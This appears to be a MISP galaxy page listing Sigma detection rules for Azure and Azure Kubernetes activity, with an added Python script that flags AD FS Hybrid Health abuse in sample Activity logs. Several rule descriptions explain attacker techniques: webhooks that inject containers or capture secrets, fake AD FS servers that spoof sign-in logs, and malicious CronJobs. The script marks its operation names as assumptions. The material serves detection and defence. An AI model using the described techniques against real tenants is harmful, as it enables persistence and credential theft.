Internal MISP references

UUID f7b5b004-dece-46e4-a4a5-f6fd0e1c6947 which can be used as unique global reference for Privileged Account Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Yochana Henderson, '@Yochana-H', Tim Shelton
creation_date 2022/08/11
falsepositive ['A legitimate new admin account being created']
filename azure_privileged_account_creation.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1078.004']

User Removed From Group With CA Policy Modification Access

Monitor and alert on membership removal from groups that have CA policy modification access.

Internal MISP references

UUID 665e2d43-70dc-4ccc-9d27-026c9dd7ed9c which can be used as unique global reference for User Removed From Group With CA Policy Modification Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mark Morowczynski '@markmorow', Thomas Detzner '@tdetzner'
creation_date 2022/08/04
falsepositive ['User removed from the group is approved']
filename azure_group_user_removal_ca_modification.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.persistence', 'attack.t1548', 'attack.t1556']

End User Consent Blocked

Detects when end user consent is blocked due to risk-based consent.

Internal MISP references

UUID 7091372f-623c-4293-bc37-20c32b3492be which can be used as unique global reference for End User Consent Blocked in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
creation_date 2022/07/10
falsepositive ['Unknown']
filename azure_app_end_user_consent_blocked.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.credential_access', 'attack.t1528']

Azure Service Principal Created

Identifies when a service principal is created in Azure.

Internal MISP references

UUID 0ddcff6d-d262-40b0-804b-80eb592de8e3 which can be used as unique global reference for Azure Service Principal Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/02
falsepositive ['Service principal being created may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Service principal created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_service_principal_created.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion']

Azure Key Vault Modified or Deleted

Identifies when a key vault is modified or deleted.

Internal MISP references

UUID 459a2970-bb84-4e6a-a32e-ff0fbd99448d which can be used as unique global reference for Azure Key Vault Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/16
falsepositive ['Key Vault being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Key Vault modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_keyvault_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.credential_access', 'attack.t1552', 'attack.t1552.001']

Azure Firewall Rule Collection Modified or Deleted

Identifies when Rule Collections (Application, NAT, and Network) are being modified or deleted.

Internal MISP references

UUID 025c9fe7-db72-49f9-af0d-31341dd7dd57 which can be used as unique global reference for Azure Firewall Rule Collection Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Rule Collections (Application, NAT, and Network) being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Rule Collections (Application, NAT, and Network) modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_firewall_rule_collection_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1562.004']

Azure Kubernetes Admission Controller

Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use a webhook such as the MutatingAdmissionWebhook to obtain persistence in the cluster; for example, attackers can intercept and modify pod creation operations in the cluster and add their malicious container to every created pod. An adversary can also use the ValidatingAdmissionWebhook to obtain access credentials, since the webhook can intercept requests to the API server and record secrets and other sensitive information.

Internal MISP references

UUID a61a3c56-4ce2-4351-a079-88ae4cbd2b58 which can be used as unique global reference for Azure Kubernetes Admission Controller in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/25
falsepositive ['Azure Kubernetes Admissions Controller may be done by a system administrator.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_admission_controller.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1078', 'attack.credential_access', 'attack.t1552', 'attack.t1552.007']

Rare Subscription-level Operations In Azure

Identifies the IPs from which users grant access to other users on Azure resources and alerts when a previously unseen source IP address is used.

Internal MISP references

UUID c1182e02-49a3-481c-b3de-0fadc4091488 which can be used as unique global reference for Rare Subscription-level Operations In Azure in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sawwinnnaung
creation_date 2020/05/07
falsepositive ['Valid change']
filename azure_rare_operations.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.t1003']

Azure Application Gateway Modified or Deleted

Identifies when an application gateway is modified or deleted.

Internal MISP references

UUID ad87d14e-7599-4633-ba81-aeb60cfe8cd6 which can be used as unique global reference for Azure Application Gateway Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/16
falsepositive ['Application gateway being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_application_gateway_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Application Security Group Modified or Deleted

Identifies when an application security group is modified or deleted.

Internal MISP references

UUID 835747f1-9329-40b5-9cc3-97d465754ce6 which can be used as unique global reference for Azure Application Security Group Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/16
falsepositive ['Application security group being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_application_security_group_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Kubernetes Pods Deleted

Identifies the deletion of Azure Kubernetes Pods.

Internal MISP references

UUID b02f9591-12c3-4965-986a-88028629b2e1 which can be used as unique global reference for Azure Kubernetes Pods Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['Pods may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Pods deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_pods_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Device or Configuration Modified or Deleted

Identifies when a device or device configuration in Azure is modified or deleted.

Internal MISP references

UUID 46530378-f9db-4af9-a9e5-889c177d3881 which can be used as unique global reference for Azure Device or Configuration Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/03
falsepositive ['Device or device configuration being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Device or device configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_device_or_configuration_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.t1485', 'attack.t1565.001']

Azure Application Deleted

Identifies when an application is deleted in Azure.

Internal MISP references

UUID 410d2a41-1e6d-452f-85e5-abdd8257a823 which can be used as unique global reference for Azure Application Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/03
falsepositive ['Application being deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_application_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1489']

Azure Subscription Permission Elevation Via ActivityLogs

Detects when a user has been elevated to manage all Azure Subscriptions. This change should be investigated immediately if it isn't planned. This setting could allow an attacker access to Azure subscriptions in your environment.

Internal MISP references

UUID 09438caa-07b1-4870-8405-1dbafe3dad95 which can be used as unique global reference for Azure Subscription Permission Elevation Via ActivityLogs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/26
falsepositive ['If this was approved by System Administrator.']
filename azure_subscription_permissions_elevation_via_activitylogs.yml
level high
logsource.category No established category
logsource.product azure
tags ['attack.initial_access', 'attack.t1078.004']

Azure Firewall Rule Configuration Modified or Deleted

Identifies when a firewall rule configuration is modified or deleted.

Internal MISP references

UUID 2a7d64cf-81fa-4daf-ab1b-ab80b789c067 which can be used as unique global reference for Azure Firewall Rule Configuration Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Firewall Rule Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Firewall Rule Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_network_firewall_rule_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Kubernetes Cluster Created or Deleted

Detects when an Azure Kubernetes cluster is created or deleted.

Internal MISP references

UUID 9541f321-7cba-4b43-80fc-fbd1fb922808 which can be used as unique global reference for Azure Kubernetes Cluster Created or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['Kubernetes cluster being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Kubernetes cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_cluster_created_or_deleted.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Network Security Configuration Modified or Deleted

Identifies when a network security configuration is modified or deleted.

Internal MISP references

UUID d22b4df4-5a67-4859-a578-8c9a0b5af9df which can be used as unique global reference for Azure Network Security Configuration Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Network Security Configuration being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Network Security Configuration modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_network_security_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Number Of Resource Creation Or Deployment Activities

Detects the number of VM creation or deployment activities that occur in Azure, based on the azureactivity log.

Internal MISP references

UUID d2d901db-7a75-45a1-bc39-0cbf00812192 which can be used as unique global reference for Number Of Resource Creation Or Deployment Activities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sawwinnnaung
creation_date 2020/05/07
falsepositive ['Valid change']
filename azure_creating_number_of_resources_detection.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1098']

Azure Virtual Network Device Modified or Deleted

Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router.

Internal MISP references

UUID 15ef3fac-f0f0-4dc4-ada0-660aa72980b3 which can be used as unique global reference for Azure Virtual Network Device Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Virtual Network Device being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Virtual Network Device modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_network_virtual_device_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Network Firewall Policy Modified or Deleted

Identifies when a firewall policy is modified or deleted.

Internal MISP references

UUID 83c17918-746e-4bd9-920b-8e098bf88c23 which can be used as unique global reference for Azure Network Firewall Policy Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/02
falsepositive ['Firewall Policy being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Firewall Policy modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_network_firewall_policy_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1562.007']

Azure Service Principal Removed

Identifies when a service principal was removed in Azure.

Internal MISP references

UUID 448fd1ea-2116-4c62-9cde-a92d120e0f08 which can be used as unique global reference for Azure Service Principal Removed in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/03
falsepositive ['Service principal being removed may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Service principal removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_service_principal_removed.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion']

Azure New CloudShell Created

Identifies when a new Cloud Shell is created inside the Azure portal.

Internal MISP references

UUID 72af37e2-ec32-47dc-992b-bc288a2708cb which can be used as unique global reference for Azure New CloudShell Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/09/21
falsepositive ['A new cloudshell may be created by a system administrator.']
filename azure_new_cloudshell_created.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.execution', 'attack.t1059']

Azure Application Credential Modified

Identifies when an application credential is modified.

Internal MISP references

UUID cdeef967-f9a1-4375-90ee-6978c5f23974 which can be used as unique global reference for Azure Application Credential Modified in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/02
falsepositive ['Application credential added may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_app_credential_modification.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Active Directory Hybrid Health AD FS Service Delete

This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid Health AD FS service instance in a tenant. A threat actor can create a new AD Health AD FS service and create a fake server to spoof AD FS sign-in logs. The Health AD FS service can then be deleted once it is no longer needed, via HTTP requests to Azure.

Internal MISP references

UUID 48739819-8230-4ee3-a8ea-e0289d1fb0ff which can be used as unique global reference for Azure Active Directory Hybrid Health AD FS Service Delete in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/08/26
falsepositive ['Legitimate AAD Health AD FS service instances being deleted in a tenant']
filename azure_aadhybridhealth_adfs_service_delete.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1578.003']

Azure Suppression Rule Created

Identifies when a suppression rule is created in Azure. Adversaries could attempt this to evade detection.

Internal MISP references

UUID 92cc3e5d-eb57-419d-8c16-5c63f325a401 which can be used as unique global reference for Azure Suppression Rule Created in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer
creation_date 2021/08/16
falsepositive ['Suppression Rule being created may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Suppression Rule created from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_suppression_rule_created.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Active Directory Hybrid Health AD FS New Server

This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid Health AD FS service. A threat actor can create a new AD Health AD FS service and register a fake server instance to spoof AD FS sign-in logs. There is no need to compromise an on-prem AD FS server; this can be done programmatically via HTTP requests to Azure.

Internal MISP references

UUID 288a39fc-4914-4831-9ada-270e9dc12cb4 which can be used as unique global reference for Azure Active Directory Hybrid Health AD FS New Server in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
creation_date 2021/08/26
falsepositive ['Legitimate AD FS servers added to an AAD Health AD FS service instance']
filename azure_aadhybridhealth_adfs_new_server.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1578']
Related clusters

To see the related clusters, click here.
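The two Hybrid Health entries above (service delete and new server) describe the same sequence: a fake AD FS server is registered into an Azure AD Connect Health service so that spoofed sign-in logs are accepted, then the service instance is deleted. The following Python is an added example, not the Sigma project's rule code. It applies that selection to Azure Activity log records constructed inline. Field names follow the flattened Activity log schema used by the Sigma `azure`/`activitylogs` logsource; the two operation-name strings and the `AdFederationService` resource-name check are this example's assumptions about the ADHybridHealthService resource provider, not values taken from the page.

```python
"""Azure Activity log triage for the AD FS Hybrid Health entries.

Added illustrative example, not the Sigma project's own rule code.
Operation names and the AdFederationService resource check are assumptions.
"""
from typing import Dict, List, Optional, Tuple

PROVIDER = "Microsoft.ADHybridHealthService"
# Assumed operation names for the two activities the entries describe.
OP_SERVICE_MEMBER = "Microsoft.ADHybridHealthService/services/servicemembers/action"
OP_SERVICE_DELETE = "Microsoft.ADHybridHealthService/services/delete"

NEW_SERVER = "Azure Active Directory Hybrid Health AD FS New Server"
SERVICE_DELETE = "Azure Active Directory Hybrid Health AD FS Service Delete"


def classify(record: Dict[str, str]) -> Optional[str]:
    """Return the matching entry name for one Activity log record, or None."""
    if record.get("CategoryValue") != "Administrative":
        return None
    if record.get("ResourceProviderValue") != PROVIDER:
        return None
    # The same provider also hosts Azure AD Connect (sync) health; only the
    # AD FS service is of interest for sign-in log spoofing (assumed naming).
    if "AdFederationService" not in record.get("ResourceId", ""):
        return None
    operation = record.get("OperationNameValue", "")
    if operation == OP_SERVICE_DELETE:
        return SERVICE_DELETE
    if operation == OP_SERVICE_MEMBER:
        return NEW_SERVER
    return None


def triage(records: List[Dict[str, str]]) -> List[Tuple[str, str, str]]:
    """(caller, caller IP, entry name) for every record that matches."""
    hits = []
    for record in records:
        name = classify(record)
        if name:
            hits.append((record.get("Caller", "?"), record.get("CallerIpAddress", "?"), name))
    return hits


# Constructed sample records; not data from a real tenant.
SAMPLE_RECORDS: List[Dict[str, str]] = [
    {   # a fake AD FS server is registered from an address that is not the on-prem agent
        "CategoryValue": "Administrative",
        "ResourceProviderValue": PROVIDER,
        "OperationNameValue": OP_SERVICE_MEMBER,
        "ResourceId": "/providers/Microsoft.ADHybridHealthService/services/AdFederationService-sts.contoso.example/servicemembers",
        "Caller": "attacker@contoso.example",
        "CallerIpAddress": "198.51.100.23",
    },
    {   # the service instance is deleted afterwards to remove the trace
        "CategoryValue": "Administrative",
        "ResourceProviderValue": PROVIDER,
        "OperationNameValue": OP_SERVICE_DELETE,
        "ResourceId": "/providers/Microsoft.ADHybridHealthService/services/AdFederationService-sts.contoso.example",
        "Caller": "attacker@contoso.example",
        "CallerIpAddress": "198.51.100.23",
    },
    {   # unrelated administrative write: must not match
        "CategoryValue": "Administrative",
        "ResourceProviderValue": "Microsoft.Compute",
        "OperationNameValue": "Microsoft.Compute/virtualMachines/write",
        "ResourceId": "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.Compute/virtualMachines/vm1",
        "Caller": "ops@contoso.example",
        "CallerIpAddress": "203.0.113.8",
    },
    {   # same provider, but the sync health service rather than AD FS: must not match
        "CategoryValue": "Administrative",
        "ResourceProviderValue": PROVIDER,
        "OperationNameValue": OP_SERVICE_MEMBER,
        "ResourceId": "/providers/Microsoft.ADHybridHealthService/services/AadSyncService-contoso.example/servicemembers",
        "Caller": "ops@contoso.example",
        "CallerIpAddress": "203.0.113.8",
    },
]

if __name__ == "__main__":
    for caller, ip, name in triage(SAMPLE_RECORDS):
        print(f"{name}: {caller} from {ip}")
```

When triaging a hit, compare `Caller` and `CallerIpAddress` against the identity and egress address of the legitimate on-prem Azure AD Connect Health agent; a server registration followed within minutes by a service delete from the same caller is exactly the sequence the two entries describe.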

Azure Owner Removed From Application or Service Principal

Identifies when an owner was removed from an application or service principal in Azure.

Internal MISP references

UUID 636e30d5-3736-42ea-96b1-e6e2f8429fd6 which can be used as unique global reference for Azure Owner Removed From Application or Service Principal in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/09/03
falsepositive ['Owner being removed may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Owner removed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_owner_removed_from_application_or_service_principal.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion']

Granting Of Permissions To An Account

Identifies IPs from which users grant access to other users on Azure resources and alerts when a previously unseen source IP address is used.

Internal MISP references

UUID a622fcd2-4b5a-436a-b8a2-a4171161833c which can be used as unique global reference for Granting Of Permissions To An Account in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author sawwinnnaung
creation_date 2020/05/07
falsepositive ['Valid change']
filename azure_granting_permission_detection.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1098.003']
Related clusters

To see the related clusters, click here.

Azure Kubernetes Secret or Config Object Access

Identifies when a Kubernetes account accesses sensitive objects such as ConfigMaps or Secrets.

Internal MISP references

UUID 7ee0b4aa-d8d4-4088-b661-20efdf41a04c which can be used as unique global reference for Azure Kubernetes Secret or Config Object Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['Sensitive objects may be accessed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Sensitive objects accessed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_secret_or_config_object_access.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Kubernetes Sensitive Role Access

Identifies when ClusterRoles/Roles are being modified or deleted.

Internal MISP references

UUID 818fee0c-e0ec-4e45-824e-83e4817b0887 which can be used as unique global reference for Azure Kubernetes Sensitive Role Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['ClusterRoles/Roles being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'ClusterRoles/Roles modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_role_access.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Keyvault Key Modified or Deleted

Identifies when a Keyvault Key is modified or deleted in Azure.

Internal MISP references

UUID 80eeab92-0979-4152-942d-96749e11df40 which can be used as unique global reference for Azure Keyvault Key Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/16
falsepositive ['Key being modified or deleted may be performed by a system administrator.', 'Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Key modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_keyvault_key_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.credential_access', 'attack.t1552', 'attack.t1552.001']
Related clusters

To see the related clusters, click here.

Azure VPN Connection Modified or Deleted

Identifies when a VPN connection is modified or deleted.

Internal MISP references

UUID 61171ffc-d79c-4ae5-8e10-9323dba19cd3 which can be used as unique global reference for Azure VPN Connection Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_vpn_connection_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Container Registry Created or Deleted

Detects when a Container Registry is created or deleted.

Internal MISP references

UUID 93e0ef48-37c8-49ed-a02c-038aab23628e which can be used as unique global reference for Azure Container Registry Created or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['Container Registry being created or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Container Registry created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_container_registry_created_or_deleted.yml
level low
logsource.category No established category
logsource.product azure
tags ['attack.impact']

Azure Kubernetes Events Deleted

Detects when Events are deleted in Azure Kubernetes. An adversary may delete events in Azure Kubernetes in an attempt to evade detection.

Internal MISP references

UUID 225d8b09-e714-479c-a0e4-55e6f29adf35 which can be used as unique global reference for Azure Kubernetes Events Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/07/24
falsepositive ['Event deletions may be done by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Events deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_events_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.defense_evasion', 'attack.t1562', 'attack.t1562.001']
Related clusters

To see the related clusters, click here.

User Added to an Administrator's Azure AD Role

User Added to an Administrator's Azure AD Role

Internal MISP references

UUID ebbeb024-5b1d-4e16-9c0c-917f86c708a7 which can be used as unique global reference for User Added to an Administrator's Azure AD Role in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Raphaël CALVET, @MetallicHack
creation_date 2021/10/04
falsepositive ["PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled."]
filename azure_ad_user_added_to_admin_role.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1098.003', 'attack.t1078']
Related clusters

To see the related clusters, click here.

Azure Kubernetes CronJob

Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Jobs can be used to run containers that perform finite tasks for batch jobs. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a Kubernetes CronJob to schedule execution of malicious code that would run as a container in the cluster.

Internal MISP references

UUID 1c71e254-6655-42c1-b2d6-5e4718d7fc0a which can be used as unique global reference for Azure Kubernetes CronJob in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/22
falsepositive ['Azure Kubernetes CronJob/Job may be done by a system administrator.', 'If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_cronjob.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.persistence', 'attack.t1053.003', 'attack.privilege_escalation', 'attack.execution']
Related clusters

To see the related clusters, click here.

Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted

Detects the creation or patching of potentially malicious RoleBindings/ClusterRoleBindings.

Internal MISP references

UUID 25cb259b-bbdc-4b87-98b7-90d7c72f8743 which can be used as unique global reference for Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/07
falsepositive ['RoleBinding/ClusterRoleBinding being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'RoleBinding/ClusterRoleBinding modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_kubernetes_rolebinding_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.credential_access']

Azure Firewall Modified or Deleted

Identifies when a firewall is created, modified, or deleted.

Internal MISP references

UUID 512cf937-ea9b-4332-939c-4c2c94baadcd which can be used as unique global reference for Azure Firewall Modified or Deleted in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/08/08
falsepositive ['Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.', 'Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.']
filename azure_firewall_modified_or_deleted.yml
level medium
logsource.category No established category
logsource.product azure
tags ['attack.impact', 'attack.defense_evasion', 'attack.t1562.004']
Related clusters

To see the related clusters, click here.

Azure DNS Zone Modified or Deleted

Identifies when a DNS zone is modified or deleted.

Internal MISP references

